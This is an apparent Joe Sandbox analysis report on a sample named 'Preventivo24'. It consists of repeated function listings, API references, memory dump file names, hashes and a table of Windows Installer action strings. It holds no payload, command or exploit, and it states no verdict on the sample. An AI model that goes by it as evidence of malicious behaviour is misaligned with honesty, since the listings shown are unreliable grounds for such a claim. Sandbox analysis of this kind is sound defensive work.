Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: e513fe08705d42bcc1d6b83a4274b0effbe09e7dbdcfe7d9212a3f855b36de83
Instruction ID: 23c3b2ef30f87dc4d16a08e4d9fa13257957c0df315324ec1a4b7b9485ad179b
Opcode Fuzzy Hash: e513fe08705d42bcc1d6b83a4274b0effbe09e7dbdcfe7d9212a3f855b36de83
Instruction Fuzzy Hash: 8EB012A52DC3C0BE310861162E03D3601ECC4E0B10330409EF000C1141FD40CC493031

Uniqueness

Uniqueness Score: -1.00%

Function 00BE754A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE752D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 8e58f05261b5e48f81ea3f0f70cf8e7b45c316cfa8f9b936c8501ae00dd9f38a
Instruction ID: 539ab22e4135d9b28d249f1e755f3bf0ad23fc190cadc957ca6d4e9f59f23b14
Opcode Fuzzy Hash: 8e58f05261b5e48f81ea3f0f70cf8e7b45c316cfa8f9b936c8501ae00dd9f38a
Instruction Fuzzy Hash: 63B012A52DC3C0FD310861162D43C3601ECC4E0B10330809EF401C1141FD40CC093031

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7540 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE752D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7dc51e0626d064f171349d3bf2ccbe30816bda60e7a17469d993fa5d4bddbd9c
Instruction ID: 7d433cc29edf39956f6656f93352495e2fc27bf66683f1e0a43b816fb0812171
Opcode Fuzzy Hash: 7dc51e0626d064f171349d3bf2ccbe30816bda60e7a17469d993fa5d4bddbd9c
Instruction Fuzzy Hash: 1DB012B52DC2C0FD310861166D03C3601ECC4E0B1033080AEF400C2141FD40CD093431

Uniqueness

Uniqueness Score: -1.00%

Function 00BE76F5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE76AE

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 2f71e07f63bfd4f7a70dc9077d642e211c6338e674bf138ce57287d931c8dab7
Instruction ID: 3fc589051ad230a144fb25139cc58fabb8963a3f14de9c05c8db4d23a4406ba1
Opcode Fuzzy Hash: 2f71e07f63bfd4f7a70dc9077d642e211c6338e674bf138ce57287d931c8dab7
Instruction Fuzzy Hash: 74B012A52DC390BD3144610A6F43C3601CCC4C0B14330805EF004C2141DE818E072031

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7622 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75F5

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a889bb76bb01278c23e671ebbebec4c543a575d08bedef5ad0e246fc95d949b5
Instruction ID: 5b082d80a3352b639a1ee69da46c34815f0ed324b16ab5824661a9961f61e8f2
Opcode Fuzzy Hash: a889bb76bb01278c23e671ebbebec4c543a575d08bedef5ad0e246fc95d949b5
Instruction Fuzzy Hash: 4CB012BA2DD3C0FD310461066D03C3A01CCE4D0B10330509AF000C1141DE40DC051032

Uniqueness

Uniqueness Score: -1.00%

Function 00BE765E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75F5

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 6934f73ae8bf9133fd30bd8c5c85e3154e0b95df078b376f64735b4480c91902
Instruction ID: 506a1686ced2a9837308fd64f93934195391d1dcc9caf1f79c8dd2a1028a27d5
Opcode Fuzzy Hash: 6934f73ae8bf9133fd30bd8c5c85e3154e0b95df078b376f64735b4480c91902
Instruction Fuzzy Hash: 37B012B92DF3C0FE310471062D07C3B01CCC4D0B10330659AF000C1141DD40DC491131

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7654 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75F5

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: fae8f1dd790af3978adcf25054657afea6432c078ca3754d75db289ca5348141
Instruction ID: fa331d43547d2b4a7be2673dea83b6c67afa42e05f2012347a9836884adf932e
Opcode Fuzzy Hash: fae8f1dd790af3978adcf25054657afea6432c078ca3754d75db289ca5348141
Instruction Fuzzy Hash: BFB012F92DE3C0FE310461062D03C3B01CCC4D0B10730909AF400C1241DD40DC091131

Uniqueness

Uniqueness Score: -1.00%

Function 009E9CE0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 009E9CEB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8ffbcbf105b89e68f85319a005a437df158d803519462990f11b1c164b0e6f05
Instruction ID: 15b561dcaad8081b9633f84d6581ac232f461ca5852df93a94c070a21e4e3de1
Opcode Fuzzy Hash: 8ffbcbf105b89e68f85319a005a437df158d803519462990f11b1c164b0e6f05
Instruction Fuzzy Hash: D8C04C716056114BDB305B19BA4878677DC6F05711F154559A85ED7640CB74DC408654

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009E3480 Relevance: 170.7, Strings: 134, Instructions: 3218COMMON

Download Yara Rule

Strings

AI_DefaultActionCost, xrefs: 009E78D1
AI_UserAccounts, xrefs: 009E7309, 009E75F7
UnpublishFeatures, xrefs: 009E3FA5
Environment, xrefs: 009E56F7, 009E6750
AI_ProcessGroups, xrefs: 009E7554
MsiAssembly, xrefs: 009E6D86
AI_XmlInstall, xrefs: 009E716C, 009E71E9
RemoveExistingProducts, xrefs: 009E34A4
AI_ChainProductsPseudo, xrefs: 009E77D7
MsiConfigureServices, xrefs: 009E6BCE, 009E6BF4
InstallFiles, xrefs: 009E5F6F
Component_, xrefs: 009E3EF8, 009E4184, 009E42CA, 009E4410, 009E46C1, 009E47E2, 009E4928, 009E4BBE, 009E4CFA, 009E5358, 009E549E, 009E55E4, 009E575E, 009E5870, 009E59B6, 009E5C5B, 009E5D7C, 009E5EC2, 009E6008, 009E6294, 009E63D7, 009E6657, 009E66DD, 009E6763, 009E6866, 009E68EC, 009E6972, 009E69F8, 009E6AFB, 009E6B81, 009E6C02, 009E6C8D, 009E6D13
AI_ScheduledTasks, xrefs: 009E7674
AI_InstallPostPrerequisite, xrefs: 009E70E6
800, xrefs: 009E3AE4
StartServices, xrefs: 009E6C54
UnregisterMIMEInfo, xrefs: 009E5179
RemoveEnvironmentStrings, xrefs: 009E5691
PublishComponent, xrefs: 009E3EC5, 009E6D00
AppId, xrefs: 009E4E0D, 009E644A
RegisterTypeLibraries, xrefs: 009E69BF
AI_Game, xrefs: 009E728C, 009E7480
Shortcut, xrefs: 009E55BB, 009E63C4
120000, xrefs: 009E557E
RemoveIniValues, xrefs: 009E52BF, 009E5405
AI_AppSearchEx, xrefs: 009E74D7, 009E74FD
RegisterProgIdInfo, xrefs: 009E651E
InstallFinalize, xrefs: 009E6ED7
200000, xrefs: 009E6E6D
AI_UninstallAccounts, xrefs: 009E72E3
RemoveIniFile, xrefs: 009E5325
StopServices, xrefs: 009E40EB, 009E4231
AI_ProcessTasks, xrefs: 009E764E
AI_InstallPrerequisite, xrefs: 009E7060
12000, xrefs: 009E4636, 009E477C, 009E48C2, 009E580A, 009E5950, 009E5AB1, 009E5BD0, 009E5D16, 009E63B1, 009E6840, 009E68C6, 009E694C
AI_UserGroups, xrefs: 009E7386, 009E757A
30000, xrefs: 009E3D58, 009E66B7, 009E6D73
AI_ProcessAccounts, xrefs: 009E75D1
MoveFile, xrefs: 009E5E8F
AI_XmlElement, xrefs: 009E7192, 009E76F1
AI_PreRequisite, xrefs: 009E6F7A, 009E7000, 009E7086, 009E710C
BindImage, xrefs: 009E6321, 009E6347
WriteRegistryValues, xrefs: 009E661E
Component, xrefs: 009E3769, 009E39DD, 009E3B28, 009E3C51
DuplicateFile, xrefs: 009E583D, 009E6261
UnregisterComPlus, xrefs: 009E4377
10000, xrefs: 009E6CED, 009E78E4
ServiceControl, xrefs: 009E4151, 009E4297, 009E6C7A
AI_GxUninstall, xrefs: 009E745A
RemoveShortcuts, xrefs: 009E554B
RegisterClassInfo, xrefs: 009E6424
~, xrefs: 009E70CA
UnregisterClassInfo, xrefs: 009E4DA7
1500000, xrefs: 009E6B5B
SelfUnregModules, xrefs: 009E44BD
Patch, xrefs: 009E611B
3000, xrefs: 009E3C1E, 009E3E92, 009E3FD8, 009E43AA, 009E4B4E, 009E4C94, 009E4DDA, 009E4F20, 009E5066, 009E51AC, 009E56C4, 009E6437, 009E65AE, 009E69D2, 009E6AD5
MsiUnpublishAssemblies, xrefs: 009E3D25
ODBCDataSource, xrefs: 009E4669, 009E6853
File, xrefs: 009E38A3, 009E5983, 009E5FD5
RemoveODBC, xrefs: 009E4603, 009E4749, 009E488F
5000, xrefs: 009E6334
AI_UninstallTasks, xrefs: 009E73DD
Font, xrefs: 009E4A3B, 009E67D6
AI_UninstallGroups, xrefs: 009E7360
RemoveFile, xrefs: 009E5AC9
Extension, xrefs: 009E4F53, 009E64C7
InstallInitialize, xrefs: 009E6E5A
RemoveFiles, xrefs: 009E591D, 009E5A63
SelfRegModules, xrefs: 009E6A45
100, xrefs: 009E60E8, 009E6531, 009E746D
WriteEnvironmentStrings, xrefs: 009E672A
15000, xrefs: 009E411E, 009E4264, 009E5E5C, 009E622E, 009E64B4, 009E6BE1, 009E6DF0
RemoveRegistry, xrefs: 009E4CC7
UnpublishComponents, xrefs: 009E3E66
1800, xrefs: 009E717F, 009E76DE
2000, xrefs: 009E35FC, 009E7279, 009E72F6, 009E7373, 009E73F0, 009E7567, 009E75E4, 009E7661
MIME, xrefs: 009E51DF, 009E65C1
InstallServices, xrefs: 009E6B48
ServiceInstall, xrefs: 009E6B6E
ProgId, xrefs: 009E50B4, 009E6544
AppSearch, xrefs: 009E35C9, 009E364A
WriteIniValues, xrefs: 009E66A4
InstallValidate, xrefs: 009E3AB1
UnregisterFonts, xrefs: 009E49D5
Location, xrefs: 009E6FB4, 009E703A
AI_GxInstall, xrefs: 009E7266
RegisterFonts, xrefs: 009E67B0
PublishComponents, xrefs: 009E6CDA
ODBCTranslator, xrefs: 009E47AF, 009E68D9
Feature_, xrefs: 009E3D8B, 009E4F86, 009E64D8, 009E6D97, 009E6F8D, 009E7013, 009E7099, 009E7133
PublishFeatures, xrefs: 009E6DDD
RegisterComPlus, xrefs: 009E6AC2
RemoveRegistryValues, xrefs: 009E4B1B, 009E4C61
MsiPublishAssemblies, xrefs: 009E6D5B
UnregisterExtensionInfo, xrefs: 009E4F08
RegisterExtensionInfo, xrefs: 009E64A1
RemoveDuplicateFiles, xrefs: 009E57D7
CostInitialize, xrefs: 009E3703
PatchFiles, xrefs: 009E60B5
CreateFolder, xrefs: 009E5C03, 009E5D49
AI_CountRowAction, xrefs: 009E7854
MoveFiles, xrefs: 009E5E29
CreateFolders, xrefs: 009E5CE3
AI_XmlAttribute, xrefs: 009E720F, 009E7777
Registry, xrefs: 009E4B81, 009E6644
500, xrefs: 009E74E5
CreateShortcuts, xrefs: 009E639E
SelfReg, xrefs: 009E4523, 009E6A6B
TypeLib, xrefs: 009E69E5
IniFile, xrefs: 009E546B, 009E66C5
AI_DownloadPrereq, xrefs: 009E6F54
100000, xrefs: 009E6EEA
AI_XmlUninstall, xrefs: 009E76CB, 009E7751
FileSize, xrefs: 009E604F
RegisterMIMEInfo, xrefs: 009E659B
InstallODBC, xrefs: 009E682D, 009E68B3, 009E6939
3000000, xrefs: 009E673D
AI_ExtractPrereq, xrefs: 009E6FDA
CostFinalize, xrefs: 009E3988
Complus, xrefs: 009E43DD, 009E6AE8
RemoveFolders, xrefs: 009E5B9D
Options, xrefs: 009E70C0, 009E7146
ODBCDriver, xrefs: 009E48F5, 009E695F
Feature, xrefs: 009E400B, 009E6E03
PatchSize, xrefs: 009E6195
6000, xrefs: 009E6631
FileCost, xrefs: 009E383D
ProcessComponents, xrefs: 009E3BEB
8000, xrefs: 009E450B, 009E4A08, 009E67C3, 009E6A58
UnregisterProgIdInfo, xrefs: 009E5033
DuplicateFiles, xrefs: 009E61FB
1500, xrefs: 009E52F2, 009E5438, 009E71FC, 009E7764
20000, xrefs: 009E6C67

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
API String ID: 0-2910470256
Opcode ID: 86250d863d299517485618cb69a111ce4754eef3e7a8561d95cb5fa3a97c97ee
Instruction ID: 96138cdb7146fcc423bea88a64a9907a7213b0f2a22b9f6e4f35cb9423baeb0c
Opcode Fuzzy Hash: 86250d863d299517485618cb69a111ce4754eef3e7a8561d95cb5fa3a97c97ee
Instruction Fuzzy Hash: 9D732564E443C696E341DBB5ED2676E2E61ABA6308F24535CF1456B3E2CBF00AC4C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A12743 Relevance: 64.7, APIs: 25, Strings: 11, Instructions: 1661memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

VariantClear.OLEAUT32(?), ref: 00A12A23
VariantClear.OLEAUT32(?), ref: 00A12B7E
VariantClear.OLEAUT32(?), ref: 00A12BB3
VariantClear.OLEAUT32(?), ref: 00A12D48
SysAllocString.OLEAUT32(00000000), ref: 00A12D59
VariantClear.OLEAUT32(?), ref: 00A12DA3
VariantClear.OLEAUT32(?), ref: 00A12DCC
SysFreeString.OLEAUT32(00000000), ref: 00A12DD7
VariantClear.OLEAUT32(?), ref: 00A12EF5
VariantClear.OLEAUT32(?), ref: 00A12F2A
